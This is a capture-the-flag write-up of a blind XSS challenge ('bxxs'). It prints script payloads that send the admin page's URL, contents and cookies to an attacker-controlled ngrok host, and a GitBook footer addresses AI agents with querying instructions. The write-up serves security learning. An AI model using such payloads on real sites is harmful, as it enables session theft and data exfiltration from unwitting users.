> For the complete documentation index, see [llms.txt](https://ctf.zeyu2001.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ctf.zeyu2001.com/2021/zh3ro-ctf-v2/bxxs.md).

# bxxs

## Problem

We've made some new epic updates to our website. Could you send us some feedback on it?

## Solution

We are given an endpoint that allows us to "Send a feedback to admin". I tried submitting URLs but these had no effect.

![](/files/-MbXGNkorTXxwBasI9li)

Later, I found that we could submit arbitrary HTML that would be rendered by the admin's browser. This could be verified by submitting the following and catching the HTTP request:

```markup
<script> var i = new Image(); i.src = "http://8a8a8026deac.ngrok.io/"; </script>
```

It is then trivial to obtain more information from the victim's browser.

We still don't know how exactly our submitted HTML is handled. Where is it rendered and in what context? To answer that question, I tried the following payload to get the page URL, contents and cookie.

```markup
<script> var i = new Image(); i.src = "http://8a8a8026deac.ngrok.io/?url=" + escape(window.location.href); </script>
<script> var i = new Image(); i.src = "http://8a8a8026deac.ngrok.io/?doc=" + escape(document.body.innerHTML); </script>
<script> var i = new Image(); i.src = "http://8a8a8026deac.ngrok.io/?cookie=" + escape(document.cookie); </script>
```

`window.location.href` gives us the full URL of the browsing context, `document.body.innerHTML` gives us the page contents, and `document.cookie` gives us any cookies that could be read by JavaScript (those without the HttpOnly flag set).

From the output, it appeared that:

* The page URL is `http://0.0.0.0/Secret_admin_cookie_panel`
* Our submitted HTML was the only content present on the page.
* JavaScript could not read any cookies.

My teammate rainbowpigeon then visited the `/Secret_admin_cookie_panel` endpoint and found that this page returned a `Set-Cookie` header for a new cookie with the HttpOnly flag set. This was the "admin cookie" we needed.

![](/files/-MbXFEsm1MXZkGgE06Je)

My teammate lim\_yj found that there is a `/flag` endpoint, previously inaccessible without the appropriate cookie.

Visiting the page again with the admin cookie set gives us the flag.

![](/files/-MbXFst9p9LN_BTEw3Rx)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ctf.zeyu2001.com/2021/zh3ro-ctf-v2/bxxs.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.